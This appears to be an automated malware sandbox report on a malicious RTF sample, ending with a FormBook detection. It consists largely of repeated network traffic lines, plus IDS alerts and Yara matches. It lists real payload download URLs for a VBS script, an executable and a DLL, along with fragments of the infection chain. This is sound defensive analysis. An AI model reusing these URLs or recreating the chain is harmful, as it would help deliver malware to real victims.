          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2019696 - Severity 1 - ET MALWARE Possible MalDoc Payload Download Nov 11 2014 : 192.168.2.22:49166 -> 185.18.213.20:443
          Potential malicious VBS script found (has network functionality)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEDropped file: stream.SaveToFile filePath, 2 ' 2 to overwrite if the file existsJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEDropped file: stream.SaveToFile filePath, 2 ' 2 to overwrite if the file existsJump to dropped file
          Source: global trafficHTTP traffic detected: GET /kokorila/cgl-bin/bin.exe HTTP/1.1Host: dl.zerotheme.irConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kokorila/cgl-bin/DLLL.dll HTTP/1.1Host: dl.zerotheme.ir
          Source: Joe Sandbox ViewASN Name: AFRARASAIR AFRARASAIR
          Source: Joe Sandbox ViewASN Name: SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR
          Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49167 -> 185.18.213.20:443
          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficHTTP traffic detected: GET /90/seethedifferentofpicture.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F96B07FF-ED02-4BEA-95F3-9B31FFA866FE}.tmpJump to behavior
          Source: global trafficHTTP traffic detected: GET /kokorila/cgl-bin/bin.exe HTTP/1.1Host: dl.zerotheme.irConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kokorila/cgl-bin/DLLL.dll HTTP/1.1Host: dl.zerotheme.ir
          Source: global trafficHTTP traffic detected: GET /90/seethedifferentofpicture.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: dl.zerotheme.ir
          Source: EQNEDT32.EXE, 00000002.00000002.360437444.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/90/seethedifferentofpicture.vbs
          Source: EQNEDT32.EXE, 00000002.00000002.360437444.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/90/seethedifferentofpicture.vbsj
          Source: EQNEDT32.EXE, 00000002.00000002.360437444.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/90/seethedifferentofpicture.vbso
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: temp_executable.exe, 00000006.00000002.378697765.000000000261B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.zerotheme.ir
          Source: temp_executable.exe, 00000006.00000002.378697765.000000000261B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.zerotheme.irX
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: temp_executable.exe, 00000006.00000002.378697765.000000000265F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.zerotheme.ir
          Source: temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dll
          Source: temp_executable.exe, 00000006.00000002.378697765.000000000265F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378543206.0000000000860000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.zerotheme.ir/kokorila/cgl-bin/bin.exe
          Source: temp_executable.exe, 00000006.00000002.378697765.000000000257F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378697765.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.zerotheme.ir/kokorila/cgl-bin/bin.exebhttps://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dll
          Source: temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
          Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
          Source: unknownHTTPS traffic detected: 185.18.213.20:443 -> 192.168.2.22:49166 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: eMJ2QgQF4u.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\ProgIDJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
